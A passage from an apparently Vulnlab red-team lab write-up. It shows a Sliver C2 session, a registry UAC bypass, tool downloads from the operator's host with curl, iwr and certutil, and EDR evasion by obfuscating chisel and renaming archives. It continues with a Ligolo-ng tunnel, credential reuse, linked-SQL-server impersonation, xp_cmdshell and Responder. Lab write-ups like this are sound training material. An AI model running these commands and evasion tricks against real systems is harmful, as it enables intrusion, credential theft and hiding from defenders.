$ cd ~/.sliver-client/extensions/RegistryShellCommand/; make

We kill our python local web server 443/tcp then we start a Sliver listener on 443/tcp (to be ok with our current ifrit-http stager profile)

[server] sliver (OFFICIAL_OSMOSIS) > https

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #3

[server] sliver (OFFICIAL_OSMOSIS) > jobs

 ID   Name    Protocol   Port   Stage Profile                              
==== ======= ========== ====== ============================================
 1    http    tcp        80     ifrit-http (Sliver name: OFFICIAL_OSMOSIS) 
 3    https   tcp        443

We add the new extension in our Sliver session:

[server] sliver (OFFICIAL_OSMOSIS) > extensions load /home/user/.sliver-client/extensions/RegistryShellCommand

[*] Added RegistryShellCommand command: Perform UAC bypass via modifying the "ms-settings\Shell\Open\command" registry key

Upload our stager:

Note
  • To continue to be more steath, it’s important to do not move under another folder and stay in the folder allocated with the sliver migrated process (in our case after migrated to explorer.exe then our folder is C:\Windows\system32)
[server] sliver (OFFICIAL_OSMOSIS) > upload stager.exe C:\\programdata\\1\\s1.exe

[*] Wrote file to C:\programdata\1\s1.exe

Then let’s go to bypass UAC with our RegistryShellCommand extension:

[server] sliver (OFFICIAL_OSMOSIS) > RegistryShellCommand C:\\programdata\\1\\s1.exe

[*] Successfully executed RegistryShellCommand (coff-loader)
[*] Got output:
Successfully created registry key: HKCU:Software\Classes\ms-settings\Shell\Open\command
Successfully set command registry value
Successfully set DelegateExecute registry value
Autoelevated EXE was successfully executed using ShellExecuteEx!
Successfully deleted registry key: HKCU:Software\Classes\ms-settings\Shell\Open\command

Then we get a new session with a High integrity level:

[*] Session c2746f85 OFFICIAL_OSMOSIS - 172.16.41.40:54254 (DEV05) - windows/amd64 - Wed, 28 Aug 2024 19:42:42 JST

[server] sliver (OFFICIAL_OSMOSIS) > use c2746f85-862d-4aa2-b28d-b13ccbdfc263

[*] Active session OFFICIAL_OSMOSIS (c2746f85-862d-4aa2-b28d-b13ccbdfc263)

[server] sliver (OFFICIAL_OSMOSIS) > sessions 

 ID         Name               Transport   Remote Address       Hostname   Username              Operating System   Locale   Last Message                            Health  
========== ================== =========== ==================== ========== ===================== ================== ======== ======================================= =========
 d8fc70ce   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:54114   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Wed Aug 28 19:42:57 JST 2024 (0s ago)   [ALIVE] 
 c2746f85   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:54254   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Wed Aug 28 19:42:56 JST 2024 (1s ago)   [ALIVE] 

[server] sliver (OFFICIAL_OSMOSIS) > getprivs 

Privilege Information for stager.exe (PID: 3964)
------------------------------------------------

Process Integrity Level: High

Name                                      	Description                                                        	Attributes
====                                      	===========                                                        	==========
SeIncreaseQuotaPrivilege                  	Adjust memory quotas for a process                                 	Disabled
SeSecurityPrivilege                       	Manage auditing and security log                                   	Disabled
SeTakeOwnershipPrivilege                  	Take ownership of files or other objects                           	Disabled
SeLoadDriverPrivilege                     	Load and unload device drivers                                     	Disabled
SeSystemProfilePrivilege                  	Profile system performance                                         	Disabled
SeSystemtimePrivilege                     	Change the system time                                             	Disabled
SeProfileSingleProcessPrivilege           	Profile single process                                             	Disabled
SeIncreaseBasePriorityPrivilege           	Increase scheduling priority                                       	Disabled
SeCreatePagefilePrivilege                 	Create a pagefile                                                  	Disabled
SeBackupPrivilege                         	Back up files and directories                                      	Disabled
SeRestorePrivilege                        	Restore files and directories                                      	Disabled
SeShutdownPrivilege                       	Shut down the system                                               	Disabled
SeDebugPrivilege                          	Debug programs                                                     	Disabled
SeSystemEnvironmentPrivilege              	Modify firmware environment values                                 	Disabled
SeChangeNotifyPrivilege                   	Bypass traverse checking                                           	Enabled, Enabled by Default
SeRemoteShutdownPrivilege                 	Force shutdown from a remote system                                	Disabled
SeUndockPrivilege                         	Remove computer from docking station                               	Disabled
SeManageVolumePrivilege                   	Perform volume maintenance tasks                                   	Disabled
SeImpersonatePrivilege                    	Impersonate a client after authentication                          	Enabled, Enabled by Default
SeCreateGlobalPrivilege                   	Create global objects                                              	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege             	Increase a process working set                                     	Disabled
SeTimeZonePrivilege                       	Change the time zone                                               	Disabled
SeCreateSymbolicLinkPrivilege             	Create symbolic links                                              	Disabled
SeDelegateSessionUserImpersonatePrivilege 	Obtain an impersonation token for another user in the same session 	Disabled

Then get the 2nd flag Ifrit_Engineering (yeah it’s not the number 1 xD):

[server] sliver (OFFICIAL_OSMOSIS) > ls C:\\Users\\Admin\\Desktop

C:\Users\Admin\Desktop (3 items, 2.6 KiB)
=========================================
-rw-rw-rw-  desktop.ini         282 B    Sun Jul 07 04:08:30 -0700 2024
-rw-rw-rw-  flag.txt            36 B     Sun Jul 14 06:05:49 -0700 2024
-rw-rw-rw-  Microsoft Edge.lnk  2.3 KiB  Sun Jul 07 04:08:31 -0700 2024


[server] sliver (OFFICIAL_OSMOSIS) > cat C:/Users/Admin/Desktop/flag.txt

VL{8a72956307264970a190873540cc4bf2}

Quick check:

[server] sliver (OFFICIAL_OSMOSIS) > ifconfig

+-----------------------------------------+
| Ethernet                                |
+-----------------------------------------+
| # | IP Addresses    | MAC Address       |
+---+-----------------+-------------------+
| 5 | 172.16.41.40/24 | 06:2c:59:49:0a:f7 |
+-----------------------------------------+
1 adapters not shown.

[server] sliver (OFFICIAL_OSMOSIS) > netstat --listen

 Protocol   Local Address            Foreign Address   State    PID/Program Name       
========== ======================== ================= ======== ========================
 tcp        0.0.0.0:135              0.0.0.0:0         LISTEN   892/svchost.exe        
 tcp        0.0.0.0:445              0.0.0.0:0         LISTEN   4/System               
 tcp        0.0.0.0:3389             0.0.0.0:0         LISTEN   352/svchost.exe        
 tcp        0.0.0.0:5040             0.0.0.0:0         LISTEN   5644/svchost.exe       
 tcp        0.0.0.0:13300            0.0.0.0:0         LISTEN   10416/node.exe         
 tcp        0.0.0.0:49664            0.0.0.0:0         LISTEN   668/lsass.exe          
 tcp        0.0.0.0:49665            0.0.0.0:0         LISTEN   528/wininit.exe        
 tcp        0.0.0.0:49666            0.0.0.0:0         LISTEN   1312/svchost.exe       
 tcp        0.0.0.0:49667            0.0.0.0:0         LISTEN   1972/svchost.exe       
 tcp        0.0.0.0:49668            0.0.0.0:0         LISTEN   2628/spoolsv.exe       
 tcp        0.0.0.0:49669            0.0.0.0:0         LISTEN   668/lsass.exe          
 tcp        0.0.0.0:49670            0.0.0.0:0         LISTEN   2956/svchost.exe       
 tcp        0.0.0.0:49676            0.0.0.0:0         LISTEN   648/services.exe       
 tcp        localhost:6788           0.0.0.0:0         LISTEN   3208/elastic-agent.exe 
 tcp        localhost:6789           0.0.0.0:0         LISTEN   3208/elastic-agent.exe 
 tcp        localhost:6791           0.0.0.0:0         LISTEN   3208/elastic-agent.exe 
 tcp        dev05.eu-ifrit.vl.:139   0.0.0.0:0         LISTEN   4/System

[server] sliver (OFFICIAL_OSMOSIS) > netstat

 Protocol   Local Address              Foreign Address         State         PID/Program Name          
========== ========================== ======================= ============= ===========================
 tcp        localhost:6789             localhost:58927         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59016         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59018         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59021         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59023         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59026         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6789             localhost:59027         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:6791             localhost:59030         ESTABLISHED   3208/elastic-agent.exe    
 tcp        localhost:58927            localhost:6789          ESTABLISHED   3380/elastic-endpoint.exe 
 tcp        localhost:59016            localhost:6789          ESTABLISHED   4916/agentbeat.exe        
 tcp        localhost:59018            localhost:6789          ESTABLISHED   4764/agentbeat.exe        
 tcp        localhost:59021            localhost:6789          ESTABLISHED   4960/agentbeat.exe        
 tcp        localhost:59023            localhost:6789          ESTABLISHED   4464/agentbeat.exe        
 tcp        localhost:59026            localhost:6789          ESTABLISHED   4968/agentbeat.exe        
 tcp        localhost:59027            localhost:6789          ESTABLISHED   5080/agentbeat.exe        
 tcp        localhost:59030            localhost:6791          ESTABLISHED   5080/agentbeat.exe        
 tcp        dev05.eu-ifrit.vl.:49677   git.ifrit.vl.:8220      ESTABLISHED   3208/elastic-agent.exe    
 tcp        dev05.eu-ifrit.vl.:49697   dc03.eu-ifrit.vl.:445   ESTABLISHED   4/System
...               

1 interface and some communication with DC03 and GIT.IFRIT.VL

Check the security in place:

[server] sliver (OFFICIAL_OSMOSIS) > sa-enum-filter-driver 

[*] Successfully executed sa-enum-filter-driver (coff-loader)
[*] Got output:
contentscreener,applockerfltr,265000
contentscreener,ElasticEndpointDriver,260350
activitymonitor,Filetrace,385000
activitymonitor,MsSecFlt,385600
activitymonitor,SysmonDrv,385201
activitymonitor,UCPD,385250
antivirus,WdFilter,328010
SUCCESS.

FW, AV, EDR and Monitoring are in place

Pleasant Password Server - Password reusing (Dev)

Check the home folder and found some stuff in Downloads:

[server] sliver (OFFICIAL_OSMOSIS) > ls

C:\Users\Admin\Downloads (6 items, 906.4 MiB)
=============================================
-rw-rw-rw-  desktop.ini                       282 B      Sun Jul 07 04:08:30 -0700 2024
-rw-rw-rw-  Firefox Installer.exe             363.3 KiB  Sun Jul 14 02:01:10 -0700 2024
-rw-rw-rw-  node-v22.4.0-x64.msi              27.6 MiB   Sun Jul 07 04:14:24 -0700 2024
-rw-rw-rw-  pdf24-creator-11.18.0-x64.exe     340.5 MiB  Sun Jul 14 02:02:47 -0700 2024
-rw-rw-rw-  Pleasant KeePass Client.exe       373.4 MiB  Sun Jul 14 01:40:41 -0700 2024
-rw-rw-rw-  Pleasant Password Client x64.exe  164.6 MiB  Sun Jul 14 01:40:51 -0700 2024

Using Google we can get some information related to Pleasant Password Client and Pleasant KeePass Client:

image

image

https://pleasantpasswords.com/info/pleasant-password-server/d-user-access-basics/keepass-desktop-client

image

https://pleasantpasswords.com/info/pleasant-password-server/d-user-access-basics/web-browser-access

image

Interesting: By default, Pleasant Password Server runs on Port 10001 and we cann access via web browser too.

As the size of these files are so big then we don’t download it at this time and focus to find a server with open port 10001/tcp.

As the upload/download feature seems not working correctly with big files then we use curl to download our nmap static package (of course need to kill the https jobs to use again our python local web server during this operation).

[server] sliver (OFFICIAL_OSMOSIS) > execute -o curl http://10.8.0.230:443/nmap_standalone.zip -o nmap.zip

[*] Output:
[*] Stderr:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 15.2M  100 15.2M    0     0   359k      0  0:00:43  0:00:43 --:--:--  551k

[server] sliver (OFFICIAL_OSMOSIS) > ls

C:\programdata\1 (2 items, 15.2 MiB)
====================================
-rw-rw-rw-  nmap.zip  15.2 MiB  Sat Aug 31 23:40:12 -0700 2024
-rw-rw-rw-  s2.exe    5.5 KiB   Sat Aug 31 22:47:09 -0700 2024

Unfortunately using this technique triggers a low alert:

image

Try with another way:

[server] sliver (OFFICIAL_OSMOSIS) > execute -o powershell iwr http://10.8.0.230:443/nmap_standalone.zip -o nmap.zip

But catched:

image

Take a note and need to think to do that with another way to stay under the SOC radar

Uncompress it:

[server] sliver (OFFICIAL_OSMOSIS) > execute tar -xf nmap.zip

Then use it to scan internal networks (we exclude 88/tcp because there is some interaction with Kerberos then can trigger an alert):

[server] sliver (OFFICIAL_OSMOSIS) > execute -t 900 -o nmap.exe -sT -p 22,80,8080,443,389,445,3389,5985,10001 --open 172.16.41.0/24 -n -Pn

[*] Output:
Starting Nmap 7.91 ( https://nmap.org ) at 2024-08-31 23:52 Pacific Daylight Time

Nmap scan report for 172.16.41.11
Host is up (0.00s latency).

PORT      STATE    SERVICE
88/tcp    open     kerberos-sec
389/tcp   open     ldap
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

Nmap scan report for 172.16.41.14
Host is up (0.00s latency).

PORT      STATE    SERVICE
88/tcp    open     kerberos-sec
389/tcp   open     ldap
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

Nmap scan report for 172.16.41.17
Host is up (0.00011s latency).

PORT      STATE    SERVICE
80/tcp    open     http
88/tcp    open     kerberos-sec
389/tcp   open     ldap
443/tcp   open     https
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

Nmap scan report for 172.16.41.210
Host is up (0.00s latency).

PORT      STATE    SERVICE
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

Nmap scan report for 172.16.41.215
Host is up (0.00s latency).

PORT      STATE    SERVICE
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman
10001/tcp open     scp-config

Nmap scan report for 172.16.41.250
Host is up (0.00023s latency).

PORT      STATE    SERVICE
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

Nmap scan report for 172.16.41.251
Host is up (0.00036s latency).

PORT      STATE    SERVICE
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman

172.16.41.215 is the Pleasant Password Server

If 88/tcp was included then we could trigger alert below:

image

The embedded socks proxy of Sliver (1.5) is not correctly stable then we will switch to chisel.

But as chisel is flag by many EDR (Defender for endpoint, Elastic EDR etc) then we obfuscate it using Garble.

Install Garble:

$ go install mvdan.cc/garble@latest

If needed install Chisel or grab the latest release:

$ go install github.com/jpillora/chisel@latest

If needed add the Go bin path to ~/.zshrc (or ~/.bashrc):

...
export PATH="$PATH:/home/user/go/bin/"

OR

...
export PATH=$PATH:$(go env GOPATH)/bin

Then obfuscate Chisel with Windows environment and amd64 architecture as target:

$ git clone https://github.com/jpillora/chisel chisel-src && cd chisel-src
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -ldflags "-s -w -H windowsgui" -trimpath
$ cp chisel.exe ../proxy.exe

Then upload it:

[server] sliver (OFFICIAL_OSMOSIS) > execute -o -t 900 certutil -urlcache -split -f "http://10.8.0.230:443/proxy.exe" proxy.exe

Hummmm even using another way (no curl, no iwr) with certutil, we trigger a low alert:

image

But the worst happens:

image

Obfuscation of chisel via garble has been detected as malware and deleted :/ shame on us !!!

Don’t want to waste time to find a more effective way to obfuscate it so we switch to Ligolo-ng and download the agent release for Windows amd64 and the proxy release for Linux arm64.

Create a new “tun” interface on our attacker machine as Proxy Server role:

$ sudo ip tuntap add user user mode tun ligolo
$ sudo ip link set ligolo up

We zip the agent to decrease the size:

$ zip a.zip agent.exe

We rename it to bypass the detection of uploading archive file:

$ mv a.zip a-zip.txt

If not renamed then we trigger an alert like this:

image

We upload it to our target then decompress it (not needed to rename to original zip file to prevent alert trigger):

[server] sliver (OFFICIAL_OSMOSIS) > upload -t 900 a-zip.txt
[server] sliver (OFFICIAL_OSMOSIS) > execute -o tar -xf a-zip.txt

We start the proxy (on 53/tcp because we already used 80/tcp and 443/tcp for our C2 and/or our local web server then after some check, only the DNS port is also allowed for outbound traffic from DEV05):

$ ./proxy -laddr 10.8.0.230:53 -selfcert   
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate 
WARN[0000] TLS Certificate fingerprint for ligolo is: 77FA4D3079CB82990925B9F12237499DCA7193874189137D33577C0B5A25F6C8 
INFO[0000] Listening on 10.8.0.230:53                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France β™₯            by @Nicocha30!
  Version: 0.6.2

ligolo-ng Β» 

We launch the agent:

[server] sliver (OFFICIAL_OSMOSIS) > execute -o agent.exe -connect 10.8.0.230:53 -ignore-cert

We can see a connection establish then we start the tunnel:

ligolo-ng Β» INFO[0147] Agent joined.                                 name="EU-IFRIT\\jack.smith@DEV05" remote="172.16.41.40:55542"
ligolo-ng Β» 
ligolo-ng Β» session 
? Specify a session : 1 - #1 - EU-IFRIT\jack.smith@DEV05 - 172.16.41.40:55542
[Agent : EU-IFRIT\jack.smith@DEV05] Β» tunnel_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active tunnels        β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ # β”‚ AGENT β”‚ INTERFACE β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
[Agent : EU-IFRIT\jack.smith@DEV05] Β» start
[Agent : EU-IFRIT\jack.smith@DEV05] Β» INFO[0180] Starting tunnel to EU-IFRIT\jack.smith@DEV05 
[Agent : EU-IFRIT\jack.smith@DEV05] Β» 
[Agent : EU-IFRIT\jack.smith@DEV05] Β» tunnel_list
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active tunnels                            β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ # β”‚ AGENT                     β”‚ INTERFACE β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ 1 β”‚ EU-IFRIT\jack.smith@DEV05 β”‚ ligolo    β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

We add a static route to route the traffic for 172.16.41.215 (the Pleasant Password Server) via our Ligolo-ng tunnel instead of the Vulnlab tun0 adapter:

$ sudo ip route add 172.16.41.215/32 dev ligolo
$ ip route
10.8.0.0/16 dev tun0 proto kernel scope link src 10.8.0.230 
...
172.16.40.0/24 via 10.8.0.1 dev tun0 
172.16.41.0/24 via 10.8.0.1 dev tun0 
172.16.41.215 dev ligolo scope link 

To be able to do not block our current Sliver session with the Ligolo-ng agent task then we background it then foreground again:

 β ‹  Executing agent.exe -connect 10.8.0.230:53 -ignore-cert ...^Z
zsh: suspended  sliver-server

$ fg
[1]  + continued  sliver-server
[!] rpc error: code = Unknown desc = implant timeout
[server] sliver (OFFICIAL_OSMOSIS) >

Even if we receive a rpc error message, we confirm that C2 and Tunnel sessions have been kept:

[server] sliver (OFFICIAL_OSMOSIS) > sessions 

 ID         Name               Transport   Remote Address       Hostname   Username              Operating System   Locale   Last Message                            Health  
========== ================== =========== ==================== ========== ===================== ================== ======== ======================================= =========
 fdcf99d3   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:55844   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Sun Sep  1 18:50:49 JST 2024 (2s ago)   [ALIVE] 
 06194493   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:55851   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Sun Sep  1 18:50:48 JST 2024 (3s ago)   [ALIVE] 
[Agent : EU-IFRIT\jack.smith@DEV05] Β» tunnel_list
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active tunnels                            β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ # β”‚ AGENT                     β”‚ INTERFACE β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ 1 β”‚ EU-IFRIT\jack.smith@DEV05 β”‚ ligolo    β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Go to https://172.16.41.215:10001/Account/SignIn to access to the Pleasant Password Server:

image

We reuse the jack.smith:JigokuNoKaen10 credentials to sign in:

image

Then found new credentials:

image

image

Found SQL\dev:Q8cYWsC54

We add 2 new routes to access directly to DC03 and SQL03 via Ligolo-ng:

$ sudo ip route add 172.16.41.14/32 dev ligolo
$ sudo ip route add 172.16.41.250/32 dev ligolo

Check again the list of all devices found during the BH analysis and found just 1 more hostname/ip:

$ dig +noall +answer sql03.eu-ifrit.vl @172.16.41.14
sql03.eu-ifrit.vl.	1200	IN	A	172.16.41.250

We can also do the same directly in our Sliver session with the sa-nslookup extension (present in Armory):

[server] sliver (OFFICIAL_OSMOSIS) > sa-nslookup sql03 172.16.41.14 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A sql03.eu-ifrit.vl 172.16.41.250

Add sql03.eu-ifrit.vl in /etc/hosts

Currently we found:

IPHOSTNAME
172.16.40.225vdi02.eu-ifrit.vl
172.16.41.14dc03.eu-ifrit.vl
172.16.40.150git.ifrit.vl
172.16.41.40dev05.eu-ifrit.vl
172.16.41.250sql03.eu-ifrit.vl
172.16.41.215

Check if our hunch is correct about the new Dev account and SQL03 server:

$ nxc mssql sql03.eu-ifrit.vl -u 'dev' -p 'Q8cYWsC54' --local-auth
MSSQL       172.16.41.250   1433   SQL03            [*] Windows Server 2022 Build 20348 (name:SQL03) (domain:eu-ifrit.vl)
MSSQL       172.16.41.250   1433   SQL03            [+] SQL03\dev:Q8cYWsC54 

Confirmed Dev can authenticate to SQL03

Check and find a linked server: SQL07.IT-IFRIT.VL (new domain it-ifrit.vl)

$ impacket-mssqlclient eu-ifrit.vl/dev:'Q8cYWsC54'@sql03.eu-ifrit.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL03): Line 1: Changed database context to 'master'.
[*] INFO(SQL03): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (dev  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
SQL03               SQLNCLI            SQL Server    SQL03               NULL                 NULL           NULL      

SQL07.IT-IFRIT.VL   SQLNCLI            SQL Server    SQL07.IT-IFRIT.VL   NULL                 NULL           NULL      

Linked Server       Local Login   Is Self Mapping   Remote Login   
-----------------   -----------   ---------------   ------------   
SQL07.IT-IFRIT.VL   dev                         0   bridge_it      

SQL (dev  guest@master)> 

dev can be used to access to SQL07 as bridge_it

We can get same information using only SQL commands:

  • Get more info on the servers
  • Check the current user on SQL07
SQL (dev  guest@master)> EXEC sp_linkedservers;
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
SQL03               SQLNCLI            SQL Server    SQL03               NULL                 NULL           NULL      

SQL07.IT-IFRIT.VL   SQLNCLI            SQL Server    SQL07.IT-IFRIT.VL   NULL                 NULL           NULL      

SQL (dev  guest@master)> SELECT * FROM sys.servers;
server_id   name                product      provider   data_source         location   provider_string   catalog   connect_timeout   query_timeout   is_linked   is_remote_login_enabled   is_rpc_out_enabled   is_data_access_enabled   is_collation_compatible   uses_remote_collation   collation_name   lazy_schema_validation   is_system   is_publisher   is_subscriber   is_distributor   is_nonsql_subscriber   is_remote_proc_transaction_promotion_enabled   modify_date   is_rda_server   
---------   -----------------   ----------   --------   -----------------   --------   ---------------   -------   ---------------   -------------   ---------   -----------------------   ------------------   ----------------------   -----------------------   ---------------------   --------------   ----------------------   ---------   ------------   -------------   --------------   --------------------   --------------------------------------------   -----------   -------------   
        0   SQL03               SQL Server   SQLNCLI    SQL03               NULL       NULL              NULL                    0               0           0                         1                    1                        0                         0                       1   NULL                                  0           0              0               0                0                      0                                              1   2024-07-07 05:05:59               0   

        1   SQL07.IT-IFRIT.VL   SQL Server   SQLNCLI    SQL07.IT-IFRIT.VL   NULL       NULL              NULL                    0               0           1                         1                    1                        1                         0                       1   NULL                                  0           0              0               0                0                      0                                              1   2024-07-14 02:51:59               0   

SQL (dev  guest@master)> EXEC ('EXEC sp_executesql N''SELECT SYSTEM_USER''') AT [SQL07.IT-IFRIT.VL];
            
---------   
bridge_it

SQL (dev  guest@master)> EXEC ('SELECT name FROM master.sys.databases') AT [SQL07.IT-IFRIT.VL];
name     
------   
master   

tempdb   

model    

msdb     

SQL (dev  guest@master)> 

Check IP address:

[server] sliver (OFFICIAL_OSMOSIS) > sa-nslookup SQL07.IT-IFRIT.VL 172.16.41.14 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A SQL07.IT-IFRIT.VL 172.16.41.251

Add sql07.it-ifrit.vl to /etc/hosts and ip route add 172.16.41.251/32 dev ligolo

Enumerate SQL users:

SQL (dev  guest@master)> enum_logins
name   type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
----   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
adm    SQL_LOGIN             1          1               0             0            0              0           0           0           0   

dev    SQL_LOGIN             0          0               0             0            0              0           0           0           0

Switch to SQL07:

SQL (dev  guest@master)> use_link [SQL07.IT-IFRIT.VL];
SQL >[SQL07.IT-IFRIT.VL]; (bridge_it  guest@master)> 

Check if we can impersonate someone:

SQL >[SQL07.IT-IFRIT.VL]; (bridge_it  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee     grantor   
----------   --------   ---------------   ----------   ---------   -------   
b'LOGIN'     b''        IMPERSONATE       GRANT        bridge_it   adm

We can impersonate the admin account adm

Login as adm:

SQL >[SQL07.IT-IFRIT.VL]; (bridge_it  guest@master)> exec_as_login adm
SQL >[SQL07.IT-IFRIT.VL]; (adm  dbo@master)> 

Enable xp_cmdshell:

SQL >[SQL07.IT-IFRIT.VL]; (adm  dbo@master)> enable_xp_cmdshell
[*] INFO(SQL07): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL07): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

As usual, DO NOT TRY any whoami command like below, else we trigger an alert:

SQL >[SQL07.IT-IFRIT.VL]; (adm  dbo@master)> xp_cmdshell whoami
output                   
----------------------   
nt service\mssqlserver

image

Now the goal is to obtain a shell as mssqlserver.

Before try that, we check if we can grab a NTLM hash.

Start a Responder:

$ sudo responder -I tun0
[sudo] password for user: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

